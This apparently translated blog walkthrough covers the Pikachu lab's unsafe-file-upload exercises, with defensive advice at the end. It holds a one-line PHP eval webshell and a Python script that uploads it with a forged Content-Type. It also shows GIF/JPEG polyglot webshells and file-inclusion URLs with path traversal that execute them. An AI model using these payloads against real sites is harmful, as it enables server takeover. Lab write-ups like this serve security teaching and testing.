Unsafe file upload


File upload is a very common feature in web applications: many sites let users upload an avatar at registration, attach files to posts, and so on. When the user clicks the upload button, the back end is supposed to check the uploaded file (is it of the allowed type, extension and size?), rename it according to a fixed scheme, and store it in a designated directory.

If the back end performs no security checks on uploaded files, or the checks are not strict enough, an attacker can upload a malicious file such as a one-line PHP webshell (the "one-sentence Trojan" of Chinese tutorials) and end up with a webshell on the server.

So when designing an upload feature, the server side must treat the incoming file as untrusted. For example:

 --Verify the file type, extension and size on the server, against an allow-list;
 --Verify how the file was uploaded (the request is attacker-controlled: the file name, the Content-Type of the file part and the bytes themselves can all be forged);
 --Rename the file to an unpredictable name chosen by the server;
 --Do not expose the path the file is stored at.

Client-side check


Try uploading a one-line webshell saved as 1.php:

<?php eval(@$_POST['password']);?>

The page rejects it with an error saying the file does not meet the requirements.


Looking at the page source, the check is done by a JavaScript function that runs in the browser.


Front-end validation is not worth much: it runs in the attacker's own browser, so simply deleting the JS check function (or disabling JavaScript, or replaying the request from a proxy) removes the check entirely.


The one-line webshell is now on the server and can be connected to with AntSword.

Path of the uploaded webshell:

192.168.80.139/pikachu/vul/unsafeupload/uploads/1.php



MIME Type

MIME (Multipurpose Internet Mail Extensions) types are labels that tell a client what kind of data it is receiving, so that the browser can decide how to render a file or which application to open it with. A MIME type has two parts: a top-level category (text, image, audio, application, ...) followed by the specific subtype, separated by a slash. Common examples:

File type       Extension       MIME type
HTML text       .html           text/html
Plain text      .txt            text/plain
RTF text        .rtf            application/rtf
GIF image       .gif            image/gif
JPEG image      .jpeg, .jpg     image/jpeg

In the second lab the server checks the MIME type of the upload, but that type is the Content-Type header of the file part in the multipart request, which the client supplies. Upload the PHP webshell again, intercept the request with Burp Suite, send it to Repeater, and change the Content-Type of the file part to an image type such as image/png; the server accepts the file.


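The two bypasses above (skipping the JS check and forging the MIME type) come down to the same fact: every byte of the upload request is written by the client. The following script is an added example, not code from the original post or from Pikachu; it builds the multipart/form-data body by hand so that the file name, the Content-Type of the file part and the contents are all chosen directly, without a browser or Burp. The lab file names (clientcheck.php, servercheck.php) and form field names (uploadfile, submit) are assumptions; check the lab's HTML form before relying on them.

```python
import secrets
import urllib.request

# Constructed example payload: the one-line webshell used in the post.
WEBSHELL = b"<?php eval(@$_POST['password']);?>"


def build_multipart(fields, file_field, filename, content, content_type, boundary=None):
    """Hand-build a multipart/form-data body.

    Everything in it, including the file's name, its extension and the
    Content-Type of the file part, is chosen by the client, which is why a
    JavaScript extension check or a server-side check on Content-Type alone
    stops nothing.  Returns (body_bytes, value for the request's Content-Type header).
    """
    boundary = boundary or "----Boundary" + secrets.token_hex(8)
    b = boundary.encode()
    crlf = b"\r\n"
    body = bytearray()
    for name, value in fields.items():  # ordinary form fields, e.g. the submit button
        body += b"--" + b + crlf
        body += b'Content-Disposition: form-data; name="%s"' % name.encode() + crlf + crlf
        body += value.encode() + crlf
    body += b"--" + b + crlf
    body += (b'Content-Disposition: form-data; name="%s"; filename="%s"'
             % (file_field.encode(), filename.encode())) + crlf
    body += b"Content-Type: " + content_type.encode() + crlf + crlf  # the forged MIME type
    body += content + crlf
    body += b"--" + b + b"--" + crlf
    return bytes(body), "multipart/form-data; boundary=" + boundary


def upload(url, fields, file_field, filename, content, content_type):
    """POST the crafted body; the browser-side JS never runs, so it cannot object."""
    body, header = build_multipart(fields, file_field, filename, content, content_type)
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", header)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # Assumed Pikachu endpoints and field names; adjust to the real form.
    base = "http://192.168.80.139/pikachu/vul/unsafeupload/"
    # Lab 1 (client check): send 1.php directly, skipping the JS check entirely.
    print(upload(base + "clientcheck.php", {"submit": "submit"},
                 "uploadfile", "1.php", WEBSHELL, "application/x-php"))
    # Lab 2 (MIME check): same file, but claim it is a PNG, as done in Burp Repeater.
    print(upload(base + "servercheck.php", {"submit": "submit"},
                 "uploadfile", "1.php", WEBSHELL, "image/png"))
```

The server-side lesson is the mirror image: the Content-Type of a file part and the client-supplied file name are inputs, not evidence, and a check that trusts either can be passed with one edited header.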

getimagesize()


getimagesize() is a PHP function that reads the header of a file and returns its dimensions and image type; the third lab uses it to decide whether an upload really is an image.

Because it only parses the leading bytes of the file and identifies the image type from that binary header, a file that starts with a valid image header passes the check no matter what follows. The detection can therefore be fooled by prepending an image file header to the PHP code.

1. Making an image webshell, method 1

Here the GIF file header is used: put the GIF signature in front of the one-line PHP code and save the file with a .png extension.

GIF89a
<?php phpinfo(); ?> 


The path the image is stored at after upload: http://192.168.80.139/pikachu/vul/unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png

The file is served as a static image, so the backdoor is executed through the file inclusion lab instead (fi_local.php includes whatever path it is given as PHP, regardless of extension):

http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2


2. Making an image webshell, method 2

Prepare a real JPEG image (2.jpeg) and a PHP webshell file (12.php).

In a Windows CMD prompt, concatenate the two into ws.jpeg. The resulting file starts with the bytes of 2.jpeg and ends with the contents of 12.php. The /b flag forces binary mode; when combining files copy otherwise defaults to ASCII mode, which can truncate the JPEG at the first Ctrl-Z (0x1A) byte.

copy /b 2.jpeg + 12.php ws.jpeg


Upload ws.jpeg:


uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg

Although getimagesize() is bypassed and the upload succeeds, requesting the image directly does not execute anything: the web server hands out .jpeg files as static content, so the PHP appended to the picture is just sent back as bytes.

The webshell must be executed through the file inclusion vulnerability instead:

http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

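To see concretely why both image-webshell methods pass a header check, and why the checklist from the introduction (type, extension, size, random rename, no path disclosure) still lets them through, here is an added example in Python, not code from the post or from Pikachu. It builds the two polyglots, runs them through a signature check that mimics what getimagesize() looks at (a simplification: PHP also parses dimensions, which the polyglots keep valid), and then through a server-side validator implementing the introduction's checklist. The sample JPEG bytes, the 2 MB limit and the storage root /srv/uploads are constructed for the example.

```python
import os
import secrets

# Constructed sample inputs, not files from the original post.
PHP_PAYLOAD = b"<?php phpinfo(); ?>"
# Minimal JPEG: SOI + APP0/JFIF segment + EOI, enough to carry the magic bytes.
JPEG_STUB = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             b"\xff\xd9")

MAX_SIZE = 2 * 1024 * 1024                       # assumed limit
SIGNATURES = {                                   # leading bytes -> image type
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
}
EXT_FOR = {"gif": ".gif", "png": ".png", "jpeg": ".jpg"}   # extension the server assigns


def make_gif_polyglot(payload):
    """Method 1 from the post: a GIF signature in front of the PHP code."""
    return b"GIF89a\n" + payload


def make_jpeg_polyglot(image, payload):
    """Method 2 from the post: PHP code appended after a real JPEG (what copy /b does)."""
    return image + payload


def sniff_image_type(data):
    """Header sniffing in the spirit of getimagesize(): only the leading bytes decide."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def server_side_validate(client_filename, data, upload_root):
    """The introduction's checklist: size, extension allow-list, content sniff, random name.

    Returns the server-side storage path (never shown to the client) or raises ValueError.
    """
    if len(data) > MAX_SIZE:
        raise ValueError("file too large")
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in {".gif", ".png", ".jpg", ".jpeg"}:
        raise ValueError("extension not allowed: " + ext)
    kind = sniff_image_type(data)
    if kind is None:
        raise ValueError("not an image")
    # The stored extension comes from the detected type, never from the client's name.
    return os.path.join(upload_root, secrets.token_hex(16) + EXT_FOR[kind])


def demo(upload_root="/srv/uploads"):
    """Run the three uploads from the post through the validator; returns a summary dict."""
    candidates = {
        "1.php": PHP_PAYLOAD,                                   # plain webshell
        "shell.png": make_gif_polyglot(PHP_PAYLOAD),            # method 1
        "ws.jpeg": make_jpeg_polyglot(JPEG_STUB, PHP_PAYLOAD),  # method 2
    }
    summary = {}
    for name, data in candidates.items():
        try:
            path = server_side_validate(name, data, upload_root)
            summary[name] = ("accepted", PHP_PAYLOAD in data, os.path.basename(path))
        except ValueError as err:
            summary[name] = ("rejected", PHP_PAYLOAD in data, str(err))
    return summary


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

Both polyglots are accepted and both still contain the PHP code, while 1.php is rejected on extension alone. That is the point of the post's last step: a header check and a random file name do not make an upload safe if something on the server (here the file inclusion lab) will later execute the stored bytes as PHP. The upload directory must be outside the web root or served with script execution disabled, and the application must not contain an include that accepts attacker-chosen paths; re-encoding uploaded images server-side, which strips appended data, is a further defense this stdlib-only example does not implement.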


Source: blog.csdn.net/ZhaoSong_/article/details/132379331